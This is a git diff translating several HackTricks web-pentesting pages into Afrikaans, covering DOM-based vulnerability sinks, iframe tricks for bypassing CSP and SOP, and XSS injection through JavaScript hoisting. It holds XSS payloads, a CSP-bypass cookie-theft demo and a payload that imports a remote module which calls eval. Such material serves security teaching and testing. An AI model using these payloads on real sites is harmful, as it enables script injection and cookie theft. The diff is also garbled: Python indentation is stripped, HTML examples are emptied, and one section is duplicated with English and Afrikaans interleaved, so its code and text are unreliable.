+**Web-boodskap kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data as 'n web-boodskap na 'n ander dokument** binne die blaaier stuur. 'n **Voorbeeld** van 'n kwesbare Web-boodskap manipulasie kan gevind word by [PortSwigger se Web Security Academy](https://portswigger.net/web-security/dom-based/controlling-the-web-message-source).
 
 Sinks:
 
-The `postMessage()` method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
+Die `postMessage()` metode vir die stuur van web-boodskappe kan kwesbaarhede veroorsaak as die gebeurtenisluisteraar vir die ontvangs van boodskappe die inkomende data op 'n onveilige manier hanteer.
 
-### DOM-data manipulation
+### DOM-data manipulasie
 
-From: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
+Vanaf: [https://portswigger.net/web-security/dom-based/dom-data-manipulation](https://portswigger.net/web-security/dom-based/dom-data-manipulation)
 
-**DOM-data manipulation vulnerabilities** arise when a script writes **attacker-controllable data to a field within the DOM** that is utilized within the visible UI or client-side logic. This vulnerability can be exploited by an attacker to construct a URL that, if visited by another user, can alter the appearance or behaviour of the client-side UI.
+**DOM-data manipulasie kwesbaarhede** ontstaan wanneer 'n skripsie **aanvaller-beheerbare data na 'n veld binne die DOM skryf** wat gebruik word binne die sigbare UI of kliëntkant-logika. Hierdie kwesbaarheid kan deur 'n aanvaller uitgebuit word om 'n URL te konstrueer wat, as dit deur 'n ander gebruiker besoek word, die voorkoms of gedrag van die kliëntkant UI kan verander.
 
 Sinks:
-
 ```javascript
 scriptElement.src
 scriptElement.text
@@ -315,20 +290,17 @@ document.implementation.createHTMLDocument()
 history.pushState()
 history.replaceState()
 ```
+### Weiering van Diens
 
-### Denial of Service
+Vanaf: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
 
-From: [https://portswigger.net/web-security/dom-based/denial-of-service](https://portswigger.net/web-security/dom-based/denial-of-service)
-
-**DOM-based denial-of-service vulnerabilities** occur when a script passes **attacker-controllable data unsafely to a problematic platform API**. This includes APIs that, when invoked, can lead the user's computer to consume **excessive amounts of CPU or disk space**. Such vulnerabilities can have significant side effects, such as the browser restricting the website's functionality by rejecting attempts to store data in `localStorage` or terminating busy scripts.
+**DOM-gebaseerde weiering van diens kwesbaarhede** kom voor wanneer 'n skripsie **aanvaller-beheerbare data onveilig deurgee na 'n problematiese platform API**. Dit sluit API's in wat, wanneer dit aangeroep word, kan lei tot die gebruiker se rekenaar wat **oormatige hoeveelhede CPU- of skyfspasie verbruik**. Sulke kwesbaarhede kan beduidende newe-effekte hê, soos die webblaaier wat die webwerf se funksionaliteit beperk deur pogings om data in `localStorage` te stoor te verwerp of besige skripsies te beëindig.
 
 Sinks:
-
 ```javascript
 requestFileSystem()
 RegExp()
 ```
-
 ## Dom Clobbering
 
 {% content-ref url="dom-clobbering.md" %}
@@ -337,12 +309,12 @@ RegExp()
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

diff --git a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
index ed6cf90df..a1c61deed 100644
--- a/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
+++ b/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
@@ -1,47 +1,46 @@
-# Iframes in XSS, CSP and SOP
+# Iframes in XSS, CSP en SOP
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
 ## Iframes in XSS
 
-There are 3 ways to indicate the content of an iframed page:
+Daar is 3 maniere om die inhoud van 'n iframed-bladsy aan te dui:
 
-* Via `src` indicating an URL (the URL may be cross origin or same origin)
-* Via `src` indicating the content using the `data:` protocol
-* Via `srcdoc` indicating the content
-
-**Accesing Parent & Child vars**
+* Via `src` wat 'n URL aandui (die URL kan kruis-oorsprong of dieselfde oorsprong wees)
+* Via `src` wat die inhoud aandui deur die `data:`-protokol te gebruik
+* Via `srcdoc` wat die inhoud aandui
 
+**Toegang tot ouer- en kindervariabele**
 ```html
 
-  
+
 
-  
-  
-  
-  
+
+
+
+
 
-  
+
 
 ```
 
@@ -52,44 +51,40 @@ var secret="child secret";
 alert(parent.secret)
 
 ```
+As jy die vorige html via 'n http-bediener (soos `python3 -m http.server`) toegang gee, sal jy opmerk dat al die skripte uitgevoer sal word (aangesien daar geen CSP is wat dit voorkom nie). **Die ouer sal nie toegang hê tot die `secret` var binne enige ifram nie** en **slegs die iframes if2 & if3 (wat as dieselfde webwerf beskou word) kan toegang kry tot die geheim in die oorspronklike venster**.\
+Let daarop dat if4 as 'n "null" oorsprong beskou word.
 
-If you access the previous html via a http server (like `python3 -m http.server`) you will notice that all the scripts will be executed (as there is no CSP preventing it)., **the parent won’t be able to access the `secret` var inside any iframe** and **only the iframes if2 & if3 (which are considered to be same-site) can access the secret** in the original window.\
-Note how if4 is considered to have `null` origin.
-
-### Iframes with CSP 
+### Iframes met CSP 
 
 {% hint style="info" %}
-Please, note how in the following bypasses the response to the iframed page doesn't contain any CSP header that prevents JS execution.
+Let asseblief daarop hoe in die volgende omseilings die antwoord aan die iframed-bladsy geen CSP-kop bevat wat JS-uitvoering voorkom nie.
 {% endhint %}
 
-The `self` value of `script-src` won’t allow the execution of the JS code using the `data:` protocol or the `srcdoc` attribute.\
-However, even the `none` value of the CSP will allow the execution of the iframes that put a URL (complete or just the path) in the `src` attribute.\
-Therefore it’s possible to bypass the CSP of a page with:
-
+Die `self`-waarde van `script-src` sal nie die uitvoering van die JS-kode met die `data:`-protokol of die `srcdoc`-eienskap toelaat nie.\
+Tog sal selfs die `none`-waarde van die CSP die uitvoering van die iframes toelaat wat 'n URL (volledig of net die pad) in die `src`-eienskap plaas.\
+Daarom is dit moontlik om die CSP van 'n bladsy te omseil met:
 ```html
 
 
- 
+
 
-  
-  
-  
-  
-  
+
+
+
+
+
 
 ```
-
-Note how the **previous CSP only permits the execution of the inline script**.\
-However, **only `if1` and `if2` scripts are going to be executed but only `if1` will be able to access the parent secret**.
+Let daarop hoe die **vorige CSP slegs die uitvoering van die inline skrip toelaat**.\
+Tog sal **slegs `if1` en `if2` skripte uitgevoer word, maar slegs `if1` sal toegang tot die ouer se geheim hê**.
 
 ![](<../../.gitbook/assets/image (627) (1) (1).png>)
 
-Therefore, it’s possible to **bypass a CSP if you can upload a JS file to the server and load it via iframe even with `script-src 'none'`**. This can **potentially be also done abusing a same-site JSONP endpoint**.
-
-You can test this with the following scenario were a cookie is stolen even with `script-src 'none'`. Just run the application and access it with your browser:
+Daarom is dit moontlik om **'n CSP te omseil as jy 'n JS-lêer na die bediener kan oplaai en dit via 'n iframe kan laai, selfs met `script-src 'none'`**. Dit kan **moontlik ook gedoen word deur 'n selfde-site JSONP-eindpunt te misbruik**.
 
+Jy kan dit toets met die volgende scenario waar 'n koekie selfs met `script-src 'none'` gesteel word. Voer net die toepassing uit en besoek dit met jou webblaaier:
 ```python
 import flask
 from flask import Flask
@@ -97,21 +92,19 @@ app = Flask(__name__)
 
 @app.route("/")
 def index():
-    resp = flask.Response('')
-    resp.headers['Content-Security-Policy'] = "script-src 'self'"
-    resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
-    return resp
+resp = flask.Response('')
+resp.headers['Content-Security-Policy'] = "script-src 'self'"
+resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
+return resp
 
 @app.route("/cookie_s.html")
 def cookie_s():
-    return ""
+return ""
 
 if __name__ == "__main__":
-    app.run()
+app.run()
 ```
-
-### Other Payloads found on the wild 
-
+### Ander vragmotors wat in die wild gevind is 
 ```html
 
 
@@ -120,31 +113,28 @@ if __name__ == "__main__":
 
 
 ```
+### Iframe sandkas
 
-### Iframe sandbox
+Die inhoud binne 'n iframe kan onderworpe word aan addisionele beperkings deur die gebruik van die `sandbox` eienskap. Standaard word hierdie eienskap nie toegepas nie, wat beteken dat daar geen beperkings in plek is nie.
 
-The content within an iframe can be subjected to additional restrictions through the use of the `sandbox` attribute. By default, this attribute is not applied, meaning no restrictions are in place.
+Wanneer dit gebruik word, plaas die `sandbox` eienskap verskeie beperkings op:
 
-When utilized, the `sandbox` attribute imposes several limitations:
-
-- The content is treated as if it originates from a unique source.
-- Any attempt to submit forms is blocked.
-- Execution of scripts is prohibited.
-- Access to certain APIs is disabled.
-- It prevents links from interacting with other browsing contexts.
-- Use of plugins via ``, ``, ``, or similar tags is disallowed.
-- Navigation of the content's top-level browsing context by the content itself is prevented.
-- Features that are triggered automatically, like video playback or auto-focusing of form controls, are blocked.
-
-The attribute's value can be left empty (`sandbox=""`) to apply all the aforementioned restrictions. Alternatively, it can be set to a space-separated list of specific values that exempt the iframe from certain restrictions.
+- Die inhoud word hanteer asof dit afkomstig is van 'n unieke bron.
+- Enige poging om vorms in te dien, word geblokkeer.
+- Uitvoering van skripte is verbied.
+- Toegang tot sekere API's is gedeaktiveer.
+- Dit voorkom dat skakels met ander blaaikontekste interaksie hê.
+- Die gebruik van plugins via ``, ``, ``, of soortgelyke etikette word nie toegelaat nie.
+- Navigasie van die inhoud se top-vlak blaaikonteks deur die inhoud self word voorkom.
+- Funksies wat outomaties geaktiveer word, soos video-afspeel of outomatiese fokus op vormbehelemente, word geblokkeer.
 
+Die waarde van die eienskap kan leeg gelaat word (`sandbox=""`) om al die genoemde beperkings toe te pas. Alternatiewelik kan dit gestel word as 'n spasiëring-geskeide lys van spesifieke waardes wat die iframe vrystel van sekere beperkings.
 ```html
 
 ```
-
 ## Iframes in SOP
 
-Check the following pages:
+Kyk na die volgende bladsye:
 
 {% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md" %}
 [bypassing-sop-with-iframes-1.md](../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md)
@@ -164,12 +154,12 @@ Check the following pages:
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/pentesting-web/xss-cross-site-scripting/js-hoisting.md b/pentesting-web/xss-cross-site-scripting/js-hoisting.md
index 6a273d359..65b471f51 100644
--- a/pentesting-web/xss-cross-site-scripting/js-hoisting.md
+++ b/pentesting-web/xss-cross-site-scripting/js-hoisting.md
@@ -2,48 +2,46 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-In the JavaScript language, a mechanism known as **Hoisting** is described where declarations of variables, functions, classes, or imports are conceptually raised to the top of their scope before the code is executed. This process is automatically performed by the JavaScript engine, which goes through the script in multiple passes.
+In die JavaScript-taal word 'n meganisme bekend as **Hoisting** beskryf waar verklarings van veranderlikes, funksies, klasse of invoere konseptueel na die bokant van hul omvang verhoog word voordat die kode uitgevoer word. Hierdie proses word outomaties deur die JavaScript-enjin uitgevoer, wat deur die skripsie in verskeie deurgange gaan.
 
-During the first pass, the engine parses the code to check for syntax errors and transforms it into an abstract syntax tree. This phase includes hoisting, a process where certain declarations are moved to the top of the execution context. If the parsing phase is successful, indicating no syntax errors, the script execution proceeds.
+Tydens die eerste deurgang ontleder die enjin die kode om te kyk vir sintaksisfoute en omskep dit in 'n abstrakte sintaksisboom. Hierdie fase sluit hoisting in, 'n proses waar sekere verklarings na die bokant van die uitvoerkonteks verskuif word. As die ontledingsfase suksesvol is, wat dui op geen sintaksisfoute nie, gaan die skripsie-uitvoering voort.
 
-It is crucial to understand that:
+Dit is noodsaaklik om te verstaan dat:
 
-1. The script must be free of syntax errors for execution to occur. Syntax rules must be strictly adhered to.
-2. The placement of code within the script affects execution due to hoisting, although the executed code might differ from its textual representation.
+1. Die skripsie vry van sintaksisfoute moet wees vir uitvoering om plaas te vind. Sintaksisreëls moet streng nagekom word.
+2. Die plasing van kode binne die skripsie beïnvloed uitvoering as gevolg van hoisting, alhoewel die uitgevoerde kode mag verskil van sy teksuele voorstelling.
 
-#### Types of Hoisting
+#### Tipes Hoisting
 
-Based on the information from MDN, there are four distinct types of hoisting in JavaScript:
+Gebaseer op die inligting van MDN, is daar vier onderskeie tipes hoisting in JavaScript:
 
-1. **Value Hoisting**: Enables the use of a variable's value within its scope before its declaration line.
-2. **Declaration Hoisting**: Allows referencing a variable within its scope before its declaration without causing a `ReferenceError`, but the variable's value will be `undefined`.
-3. This type alters the behavior within its scope due to the variable's declaration before its actual declaration line.
-4. The declaration's side effects occur before the rest of the code containing it is evaluated.
-
-In detail, function declarations exhibit type 1 hoisting behavior. The `var` keyword demonstrates type 2 behavior. Lexical declarations, which include `let`, `const`, and `class`, show type 3 behavior. Lastly, `import` statements are unique in that they are hoisted with both type 1 and type 4 behaviors.
+1. **Value Hoisting**: Maak die gebruik van 'n veranderlike se waarde binne sy omvang moontlik voordat dit gedeclareer word.
+2. **Declaration Hoisting**: Maak dit moontlik om na 'n veranderlike binne sy omvang te verwys voordat dit gedeclareer word sonder om 'n `ReferenceError` te veroorsaak, maar die waarde van die veranderlike sal `undefined` wees.
+3. Hierdie tipe verander die gedrag binne sy omvang as gevolg van die verklaring van die veranderlike voor sy werklike verklaringslyn.
+4. Die neveneffekte van die verklaring vind plaas voordat die res van die kode wat dit bevat, geëvalueer word.
 
+In detail vertoon funksieverklarings tipe 1 hoisting-gedrag. Die `var` sleutelwoord toon tipe 2-gedrag. Lexikale verklarings, wat `let`, `const` en `class` insluit, toon tipe 3-gedrag. Laastens is `import`-verklarings uniek omdat hulle gehoist word met beide tipe 1- en tipe 4-gedrag.
 
 ## Scenarios
 
-Therefore if you have scenarios where you can **Inject JS code after an undeclared object** is used, you could **fix the syntax** by declaring it (so your code gets executed instead of throwing an error):
-
+Daarom, as jy scenarios het waar jy **JS-kode kan inspuit nadat 'n ongedeklareerde voorwerp** gebruik is, kan jy die **sintaksis regmaak** deur dit te deklareer (sodat jou kode uitgevoer word in plaas van om 'n fout te veroorsaak):
 ```javascript
 // The function vulnerableFunction is not defined
-vulnerableFunction('test', ''); 
+vulnerableFunction('test', '');
 // You can define it in your injection to execute JS
 //Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
 '-alert(1)-''); function vulnerableFunction(a,b){return 1};
@@ -56,7 +54,7 @@ test'); function vulnerableFunction(a,b){ return 1 };alert(1)
 // If a variable is not defined, you could define it in the injection
 // In the following example var a is not defined
 function myFunction(a,b){
-    return 1
+return 1
 };
 myFunction(a, '')
 
@@ -70,7 +68,7 @@ var variable = new unexploitableClass();
 
 // But you can actually declare it as a function, being able to fix the syntax with something like:
 function unexploitableClass() {
-    return 1;
+return 1;
 }
 alert(1);
 ```
@@ -82,16 +80,39 @@ alert(1);
 test.cookie('leo','INJECTION')
 test['cookie','injection']
 ```
+## Meer Scenarios
 
-## More Scenarios
+### Scenario 1: Hoisting in JavaScript
 
+### Scenario 1: Hoisting in JavaScript
+
+In JavaScript, hoisting is a behavior where variable and function declarations are moved to the top of their containing scope during the compilation phase. This means that you can use variables and functions before they are actually declared in your code.
+
+In JavaScript, hoisting is 'n gedrag waar variabele- en funksiedeklarasies na die boonste gedeelte van hul omvattende omvang verskuif word gedurende die samestellingsfase. Dit beteken dat jy veranderlikes en funksies kan gebruik voordat hulle werklik in jou kode verklaar word.
+
+For example, consider the following code:
+
+Byvoorbeeld, oorweeg die volgende kode:
+
+```javascript
+console.log(x); // Output: undefined
+var x = 5;
+```
+
+In this example, the variable `x` is declared and assigned a value of `5` after the `console.log` statement. However, when the code is executed, the output is `undefined`. This is because the variable declaration is hoisted to the top of the scope, but the assignment is not hoisted. Therefore, at the time of the `console.log` statement, the variable `x` exists but has not been assigned a value yet.
+
+In hierdie voorbeeld word die veranderlike `x` verklaar en 'n waarde van `5` toegeken na die `console.log`-verklaring. Wanneer die kode egter uitgevoer word, is die uitset `undefined`. Dit is omdat die veranderlike verklaring na die boonste gedeelte van die omvang verskuif word, maar die toekenning nie verskuif word nie. Daarom, op die tydstip van die `console.log`-verklaring, bestaan die veranderlike `x`, maar dit het nog nie 'n waarde gekry nie.
+
+This behavior can be leveraged in cross-site scripting (XSS) attacks to execute malicious code. By injecting JavaScript code that relies on hoisting, an attacker can manipulate the execution flow and potentially gain unauthorized access or perform other malicious actions.
+
+Hierdie gedrag kan benut word in kruis-webwerf-skripsie (XSS) aanvalle om skadelike kode uit te voer. Deur JavaScript-kode in te spuit wat afhanklik is van hoisting, kan 'n aanvaller die uitvoervloei manipuleer en moontlik ongemagtigde toegang verkry of ander skadelike aksies uitvoer.
 ```javascript
 // Undeclared var accessing to an undeclared method
 x.y(1,INJECTION)
 // You can inject
 alert(1));function x(){}//
 // And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
-x.y(1,alert(1));function x(){}//) 
+x.y(1,alert(1));function x(){}//)
 ```
 
 ```javascript
@@ -106,11 +127,11 @@ x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")
 // The imported module:
 // module.js
 var x = {
-  y: {
-    z: function(param) {
-      eval(param);
-    }
-  }
+y: {
+z: function(param) {
+eval(param);
+}
+}
 };
 
 export { x };
@@ -123,23 +144,22 @@ export { x };
 // And the same injection was replicated in the body URL to execute an alert
 
 try {
-    if(config){
-      return;
-    }
-    // TODO handle missing config for: https://try-to-catch.glitch.me/"+`
+if(config){
+return;
+}
+// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
 let config;`-alert(1)`//`+"
-  } catch {
-    fetch("/error", {
-      method: "POST",
-      body: {
-        url:"https://try-to-catch.glitch.me/"+`
+} catch {
+fetch("/error", {
+method: "POST",
+body: {
+url:"https://try-to-catch.glitch.me/"+`
 let config;`-alert(1)-`//`+""
-      }
-    })
-  }
+}
+})
+}
 ```
-
-## References
+## Verwysings
 
 * [https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios](https://jlajara.gitlab.io/Javascript\_Hoisting\_in\_XSS\_Scenarios)
 * [https://developer.mozilla.org/en-US/docs/Glossary/Hoisting](https://developer.mozilla.org/en-US/docs/Glossary/Hoisting)
@@ -147,14 +167,14 @@ let config;`-alert(1)-`//`+""
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
index a13c56eec..ec1e26c4b 100644
--- a/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
+++ b/pentesting-web/xss-cross-site-scripting/other-js-tricks.md
@@ -1,21 +1,20 @@
-# Misc JS Tricks & Relevant Info
+# Verskillende JS-truuks & relevante inligting
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
